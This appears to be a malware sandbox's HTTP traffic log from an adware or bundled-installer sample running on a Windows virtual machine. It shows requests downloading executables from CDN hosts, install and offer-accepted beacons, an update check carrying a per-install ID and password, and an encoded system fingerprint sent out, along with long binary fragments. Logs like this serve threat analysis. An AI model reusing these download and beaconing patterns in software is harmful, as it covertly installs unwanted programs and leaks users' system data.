mp;PartnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1">h
ere</a>.</h2>..</body></html>....<!DOCTYPE 
html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.or
g/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://w
ww.w3.org/1999/xhtml" >..<head><title>...Untitled Page.
.</title></head>..<body>..    <form name="form1" 
method="post" action="ka.aspx?CV=2.0.0.0&ProductID=12000&UserI
D=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&OS=10
&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-9
9df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&P
artnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1" id="form
1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" va
lue="/wEPDwUJNzgzNDMwNTMzZGR2ZsAnoxOCObOpC82NfSRA21X80Q==" />..    
<div>..    ..    </div>..    </form>..</body>.
.</html>....
<<< skipped >>>


GET / HTTP/1.1
Host: VVV.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=VuoyVdCFJoWFNIS-gOgJ
Content-Length: 260
Date: Sat, 18 Apr 2015 23:35:50 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=VuoyVdCFJoWF
NIS-gOgJ">here</A>...</BODY></HTML>..HTTP/1.1 302
 Found..Cache-Control: private..Content-Type: text/html; charset=UTF-8
..Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=VuoyVdCFJoWFNIS-gOg
J..Content-Length: 260..Date: Sat, 18 Apr 2015 23:35:50 GMT..Server: G
FE/2.0..Alternate-Protocol: 80:quic,p=1..<HTML><HEAD><m
eta http-equiv="content-type" content="text/html;charset=utf-8">.&l
t;TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>
302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.goo
gle.com.ua/?gfe_rd=cr&ei=VuoyVdCFJoWFNIS-gOgJ">here</A>..
.</BODY></HTML>....



GET /3428_92a5d683c188790231b1aa2af09de41e/2.pak HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: dlrkbt247pbk6.cloudfront.net
Accept: */*
Accept-Encoding: gzip, deflate
Connection:keep-alive


HTTP/1.1 200 OK
Content-Type: binary/octet-stream
Content-Length: 2937235
Connection: keep-alive
Date: Sat, 18 Apr 2015 10:04:19 GMT
Last-Modified: Sat, 18 Apr 2015 09:11:52 GMT
ETag: "481d84916afd9afb59e27c5103cccb3a"
Accept-Ranges: bytes
Server: AmazonS3
Age: 48716
X-Cache: Hit from cloudfront
Via: 1.1 5cf92a5f0d15957adedbf5e2d31d88c2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LraLZntyy_mhogH_aah3sstXsMdxoByG6yn8F-5PBsDQNSDNIHVCHA==
................,.............474.db...W.J.P.iWa4...<..A#.<y....
\..-2...a7."....}.zx....(....N.J8...t.J.-Q..C$....G.!;Q`..%...D.>uZ
....s.L........* ...i.5A.`.....j._\.....e.M. ..}.....\[...............
u97LI0N5PK..........bF]=..............wpm_v20.0.0.1953_0302.exe..S.nM.
...m....m..m..m..l..m.:.\...E....s{.*F.5j.......z.......T.C.t.f.,f..y.
^.a.....P.3.O^:.~L....(.......Z..,...R...xN......*g...2.._.i.y..A[7..K
%...W... Jn.ET.d3.8.A.Rpi>..E..}.......Eb.L/..../.Q.../..q.........
..[.VZ..4_..J.4.(...{..SQ....f....*.....1.}BO..........gD..?..|od...W.
.].6..a.E....*Rz...&...G.....5.dW ..nD7&..4C2......zb.Be..[....T(b...r
j..4X....g........u>Y..~..D!...5.Z...w.....w.[...N......M.........i
....l..3..."..W7.D.t.........Cv.r.-........N..1..B...<.......zI....
...G.F#Al...;..L..[.j.g.w._...~z.../......s...h]..R........K...1....v}
~..].....Rd]?a....#.".]r..-..x....Z...z|`.......x..)..4/...........N..
aQG...lq.4`..`....d>.....wGyf.q.RzN.....9,.t.Rr..=......M.%....l[&g
t;..Bt.<...D..G..S4.$s.g..... ...Y.N.h`..Y...3.5.m."..Pfc%j..$.....
R...J..i..x...?J.T.)L..@%......F9..L.#..`}7....q.%....sj.]. ...r.../z.
.Ff.<x-b.d..P..pE..l`k.?:n..Aq.....<..F.....^..r...7.b\....}.,$.
p)<..Q.....U.>.D.....@}4u.....N....#..A 4g2.uU.r}"......#X....d.
{.)..........R..m.DR.d.2.......o#....30O......(g(H.Aro...0.P....tt5.7@
W4;....BR.J1^Lf....H'..q...HMA..of.]w#..?..I..~>FL2.T.v:.&\..${.KB.
.....o.Z.R.&.<....Zf)...".D<...@_.....WE....*.[\.b..W._?.S{.x..,
....pP...qC\. ....zC....9:.Yc[a..^.~..%2...h...=a.h..Y...'ia;V..&.
<<< skipped >>>


GET /s/abel/v6/3YEwT2a1878zysq92S8_9w.eot HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: fonts.gstatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: font/eot
Last-Modified: Thu, 28 Aug 2014 18:23:54 GMT
Date: Thu, 16 Apr 2015 23:44:24 GMT
Expires: Fri, 15 Apr 2016 23:44:24 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Server: sffe
Content-Length: 10793
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 172336
Alternate-Protocol: 80:quic,p=1
..........e.eL.\..w..eq/..NY..].w..RX......R..h.[..}.7.....;.3.$s..L..
[email protected][email protected]..........,.....rL....-........C..
....x.......%...............S..o...}.0.......8....e.N!Keg.i.2e.x$f....
.J"R..b.?m.I9X%.1.C.zI..Ah^aJ I.w..%S.A..NJ...!8...vIC..S..H...%......
GD..]...4m%%....n.R..i..n.T..$..W..E.Sm.-*[email protected].~%....1.9u.
...1V..{xh....I..H..4.i..N...B..1.......;.<......e.?/...1.Jy ..`;..
$...k.p....:.L.-.......r....s..\..1_X.h.I....$o....d.C.cga~F.-..F.....
?.0~...C.'.7d...r..3..}....&=......9...q..7.....x/^:.K..Ec.......f.hx(
X..:... ....... J......%KX..1..0.kNX:.W...).......J.z..2....4b.......2
'.Gm9e..wS.Tx.dS.....=....j#.}..V...c..s.H......#.....G.r......\:.E.61
..D.7... I...y.9g!...L.%...8J..3.^F.8....]BgG.,^i......?.88v...;....&g
t;l=\x...O{..N.D.A.K.....O.b]o.....,.5...lW-N;....11-X..'.:.%..j....".
G%V.....G..Xg.......n....0w-."[email protected].'....p$....G4..p....V.w.......[|.
....C.........h..bB.Qc.`..K..v.|...eK..7.Vj...z.....fv.&PB.K.T.2..|1..
.._x..5...O....l."...(h...............W..Q....D_.&U...S....5..].......
.6.k.=......^......i./:.F0./..r_.........9.......7!...a.."...s........
.....3'.lz...k..H.$...wF.7...tlUI.^aH.Q..K.eZ.....IF.]kj..0.....f|:...
.....R.....\Q.mG....]/<....}1.1.>...b(<.\B.\...}.e........o(.
.>.o.=F..z.J"...l.....Ua?S..a.".3-q@v...$.'F..lNn&~0..Sy*......Y...
..p.......R*....T.G%M?....i..Y.8'..,F..Z.k....b....S......P.%x...0W...
]@;O...l..W....W.C(.....<..^.Y.(t=.#s....5..7.I.....}....E3.{~.....
. .^...1.....A[.....1l.R....jYX...7.`b.`.F.......Wh....X...)...Qt"
<<< skipped >>>


GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=0&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&ElapsedTime=1429400138&SBPIDS=1 HTTP/1.1
User-Agent: CoreWinInet
Host: online.GOOBZO.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=vkmfd445f45dw155tpmcir55


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 100546
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 18 Apr 2015 23:35:38 GMT
Connection: close
<RESULT>.<LICENSE><STATUS>YaBhX1FVSUY=</STATUS>
;<EXPIRATION>0</EXPIRATION></LICENSE><UPDATE>.
<EXIST>0</EXIST>.<VERSION></VERSION>.<PAGE_
URL></PAGE_URL>.<DOWNLOAD_URL></DOWNLOAD_URL>.<
;DOWNLOAD_FILENAME></DOWNLOAD_FILENAME>.</UPDATE>.<S
TATS><COLLECT>1</COLLECT></STATS>.<YTA><
CONFIG><SITES><LEN>99864</LEN>..<ZIP>0</
ZIP>..<XMLVERSION>20131113143800</XMLVERSION><DATA&g
t;..hzmx6NSdzPupSuFmPETTOwEaP5MtN3k5B2a5khhOAdWUsYMpoVIMyJmCvgMilCqVBj
4UbQPeysvtYNiJVZNbRiQ7kiQsDUsNZ3MEYy1JfoBg o4pFsDooC00NO31pfd X8nXxC3V
p1HfKOwdgo62mJR71PwoZndR4AVDfbY4 9wFzk5tF 7727dskH5IZvVtCTpSQRswno298p
arAhgqN6qT czhzLjGJDuSJCwNSw1xwvWc8nan6y8O2JpeHgh8bMQc3Btg097LREoQ8w0F
1OQktY78pcFTqkKychePn/BkFKYzMvpZMy3oEVdiQxtA5xdCc2YpO8/CTqFCBwPADyfxYv
2FEVfbbiJm9OYFcu118IHvVTOrVQafL QEq0UE2pvXQCRnwiLKkp2rjL8gdMtEShDzDQXU
5CS1jvylwVOqQrJyF4 f8Dt4Oelu3aKGRqumrg /iFozngL0PZo7xV IapaBL0J2JDuSJC
wNSw0svxf0mAsRlmEq8DYMfNoIOuCvQUIqzx3Jp/JaHAbdZcJOoUIHA8AP5qvMAtrk934H
d6DRXxR/qRhAvBesE3Xujk7yXbEuF7GpHiEFiCgrxFB5bOBLlmCPV7tVm0pUOGtH43b05W
UQ5y/jTrneLb7G3yjsHYKOtpgOWQYwQw2yOF7cSHoRn1cSqUrhZjxE0zsejhg2EGJPm5Xv
sdYcwlgFCPIGtJXT5or44D/zrQcOo12lJj5r3ojdmAGFido 37oT3SwxUyBYApR71PwoZn
dR4AVDfbY4 9zwk5A4Jnge/RPdLDFTIFgCZLLU7dfR VD VN6OwG s/84tOgdW/RrWk0GO
NPWePfzAC91wf62CJMVfxez40MStk0GONPWePfwyH243G2GPaN L3Yb09J2jjg1O9xFNo7
LRCtQYSZvjaZZMK3muQBGik0GONPWePfwyH243G2GPaN L3Yb09J2jjg1O9xFNo7Ku
<<< skipped >>>


GET /pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.224164603995264 HTTP/1.1
Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:11 GMT
Expires: Sat, 18 Apr 2015 20:48:31 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 641720e73fe93af037f911457c12ae1e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6Xdi_la-zh7eMYmqKFvShTmLXMs_ju78QDlsi-rF--EKu_oEFntIpw==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
5:11 GMT..Expires: Sat, 18 Apr 2015 20:48:31 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 641720e73fe93af037f911457
c12ae1e.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 6Xdi_la-zh7eMYmqKFvS
hTmLXMs_ju78QDlsi-rF--EKu_oEFntIpw==..0..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1453
content-transfer-encoding: binary
Cache-Control: max-age=544395, public, no-transform, must-revalidate
Last-Modified: Sat, 18 Apr 2015 06:50:09 GMT
Expires: Sat, 25 Apr 2015 06:50:09 GMT
Date: Sat, 18 Apr 2015 23:38:32 GMT
Connection: keep-alive
0..........0..... .....0......0...0......T3t.%..O.E..~..F.=....2015041
8065009Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._)..a.
.eR&.....Y.)..".\....20150418065009Z....20150425065009Z0...*.H........
..........3..9..A..A....kqk......".R.P.....A.......A.7.......WT...=p.m
.b...az.K..#..`.j\...g...._..v.OV...Z.......yr...m..bi..}."......O.."3
..4.......... l...e.[Y....6p..yh.....u..r]A....j...U..z...ae..'.7.'.7 
..../.......`|....$..DU.p......n. :.:.........n.-......0...0...0..3...
..../...b.v..-....l}0...*.H........0_1.0...U....US1.0...U....VeriSign,
 Inc.1705..U....Class 3 Public Primary Certification Authority0...1412
02000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporatio
n1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G1
 OCSP Responder Certificate 30.."0...*.H.............0..........'.....
.Y..x.3B1.7..Q..`..d.. ....s..t.$a.....j2R.{ ,*..c{.3.....H..3-; )....
.0._...*..9M..V...... ...{m...-.......)..tR..{D....~...M...T..pS.p..^|
o....S..v.).)[email protected]#qh...u1T.].G0.]E...=._.....
. ........TE...Sa.s4........r...3.............0..0...U....0.0l..U. .e0
c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......
0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .
....0......0!..U....0...0.1.0...U....TGV-B-2730...*.H.............$..H
......oU....Y!.z{*.V.M..u.._z..3>.. 0....3..m.....e.......a..D.....
......e..F6:.y.....di.......<y.Z.......x}..q.2....UZ1 :,....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= HTTP/1.1


Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=590713, public, no-transform, must-revalidate
Last-Modified: Sat, 18 Apr 2015 19:40:18 GMT
Expires: Sat, 25 Apr 2015 19:40:18 GMT
Date: Sat, 18 Apr 2015 23:38:32 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..2015041
8194018Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
..M.s.Q~...@?j.......20150418194018Z....20150425194018Z0...*.H........
.......$c.!|..m..L.Z..N....u."%x..'.9.R...C.ZU3F.F:.J7.....F...X..?8..
).H34< .-...q..w.F...%.*........1.b#GA`U*....H.e.p-.r....5..oK.1r..
.S.. *..H/83.b.1...`..(....c4.f...d\.>....aO>.4.%...a...`.;/....
.hO%......"...O.......7............p.......4|U...p....s.P;.....#0...0.
..0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of us
e at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Cod
e Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0
...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Term
s of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign C
lass 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0....
.........m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d.
..nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F
*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."
...:.C.Q.i~rl..<..krS..8.B..o][email protected]
...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.v
erisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS i
ncorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...
U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...
<<< skipped >>>


GET /v4/sof-ient/267123711_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,smt&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,smt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:34 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a..{"stats":"ok","time":"303.82 ms","message":"store 3 action and 5 u
pdate "}..0......


GET /v4/sof-ient/267123711_198339_B48A115F?action1=install.smt HTTP/1.1


Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:34 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.57 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:36:34 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.57 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /mirror/nerocrossrider/appshat_generic.exe HTTP/1.1
User-Agent: Better Installer(Mozilla)
Host: d3hm9b8fv0d908.cloudfront.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 285558
Connection: keep-alive
Date: Sun, 12 Apr 2015 05:05:02 GMT
x-amz-version-id: zdbgB_7owwl7Hq6LIKQBG0yBaPWISKtC
x-amz-meta-s3cmd-attrs: uid:500/gname:www/uname:www/gid:500/mode:33204/mtime:1415096893/atime:1415097003/ctime:1415096894
Cache-Control: max-age=3600
Last-Modified: Tue, 04 Nov 2014 11:01:28 GMT
ETag: "518879abe3170dabd172dfffcd165598"
Accept-Ranges: bytes
Server: AmazonS3
Age: 3017
X-Cache: Hit from cloudfront
Via: 1.1 fa33eef0f024359c4b76b9960200b440.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Rlzf2PRggf0C9sh-0CToPFKLXDaax0kVO-C_4JAx2dDJqBQdk-9U1Q==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......@...............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
[email protected]..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


GET /sd?is=sm HTTP/1.1
Range: bytes=457863-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 457863-523271/523272
Content-Length: 65409
Connection: keep-alive
[email protected].............%...a...A*..P..=>(..;.....v..@
j....|)[email protected]%..=(..$.9.lP..n.4...S......!0.....<...9.T.5-.:.
L.=.E...........W.4r.lk..c...'.P~..............D.-k.q.=co$.0....\L..&_
&z.].HN....)7..|.[.Q;.Aa<.....0]....K.....g`x..Pw...L!!.........fR.
Dht_H....X...h..n.....~.n.... v,[email protected].:../..Q.'
......AD...^...'.....If.X........u..g.....D.1aW.w....3..J9....VQ5.].. 
A.?...t......>N.V.u.Q.....}..dT<b.*..s.t..W.1(......; ..!...^Q.l
...P....ZC....iLU....o4..<..8.ld...\O..........o.|...J.........KB$.
.|n.x...~...'}....Y.v..`~..^..~z.TU..T.......=p~..W.,..K...d........lb
O#R.`.3y.m...6..o..."2C[.X[q.....ws.x..^...[..L(..5'.g.T.x....Q./!u.8.
.......*...g..~....).FY...Y.F.M..G.By......r.eE..dI..b. ..>C.....aS
I......"X..1.......L..7.1..Jj.E.D..........m.C..../o.n...[.I.v..SP....
e......'Bxn..H...dp.O....#:..{..?..^....O.. ....MD...D'N.*.....6.M..R.
P.a.............d..;...h4T.....(./BsjpD.......hH0..,.2.B..5...!.M.. 1.
...B.@...'.E..x~....f..N..=!.1....:.J....gj....C.._. G".......o.Q9.O..
#.u........T.....(...W#.(.CIt=...*.>dn*..n.b.."............[..=.,$.
\..R..`k(%...q.|l..M../.0(..L#9....F.Z.G<...W`.X.H\.e.;.....j.M....
..........q..H........S..`..e|)[email protected].?.>.\..i;...0.....
G......./...V.V. .j.w|....X.>r....ifZ.X...g.../sU2..p6.$....R......
..,.....X..!S~.Wq..u...^.......*>..(.d....e..|I....nx...W....C2*..)
.j;{Y..mw*BW.....nu.. F...(......3wXt.g.zL..*.l...O@ze......'.4...A..1
!........Y....V..G5s.p.9...\[email protected]\U......'@1...L.e.tq...
<<< skipped >>>


GET /10870.ashx?e=NEjPoAxksx39yuFJumnxsjn4eNYQ9SOWQF3UKsSdb2t7HO4WybUyR1UeQGsGyqMalvCEtd9tAC4n5kT0ibNwlGAqR2XPWVGh jCDsw4o/xYUAvnawhe3hVdVxGgZRPVfMXFTku JRco heK0xfXkQRxc81u2rgCm44UuTa3qd5D7MusukiOxFesStD0GefRodseikVg j 96 SYftL70trCPXfs0VGOutK1wir 9nJN2uJXiY94Hd9BsUJC/kEr0V2YT/J4lJ7qLkJa1saxG4d9O68WmdWuUkHZX2hYJHhrZua0qaNRZzqVyeEjxCyoP0GbKHsMThLvzP8wrMbNKWJGXO0HAFwG1R7Qc7lJh uHebZZiKi64b1faQyCq7DrsmXNtOW7Zday9rCVSgOD pjAKNPoaDrBh6/v/Hm2KcpYHy1S9Ab35kZ/TvhUEvA3 3MoS/fu50NJ4btJZyNF/hC 3M747DWtv9NO1ldFnCjFnWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYMiISMf8I5JK HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /10870.ashx?e= 0m13SthQpv9yuFJumnxstsI3CMRjvhxQF3UKsSdb2t7HO4WybUyR1UeQGsGyqMalvCEtd9tAC56VMsYWoITeGAqR2XPWVGhYJpucY5gZaQiNxS6innVfUKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFMKnOuU1A3b8B8JOn8ja2rlfdNbrt4cE5zCONStn omRT/rv 3Ugl9NjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5 HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:46 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:46 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /app/ping.ashx?e=ivSYnxWU6cjhuuY8t0g74t8/z1mRXxm3v7giBVAIY12rMrg41l/Ly7CST5Ycto3cE6nMAQ0x67lxVrNxtz1yEbBRuaRLHbXnHR1BOlQeSG TPkAVkd2bb47DCigMuA0x&product=EXTFirefox&rnd=1429400150&it=0&action=Init&text=Ext version: 1.0.0.1. Firefox version: 29.0.1. DB name: yta_database1_0_0.json. DB version: 1.0.0.1 HTTP/1.1
Host: rep.youtubeaccelerator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:50 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
NET..Date: Sat, 18 Apr 2015 23:35:50 GMT..Content-Length: 0..



GET /?gfe_rd=cr&ei=VuoyVdCFJoWFNIS-gOgJ HTTP/1.1
Host: VVV.google.com.ua
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=VuoyVdCFJoWFNIS-gOgJ&gws_rd=ssl
Cache-Control: private
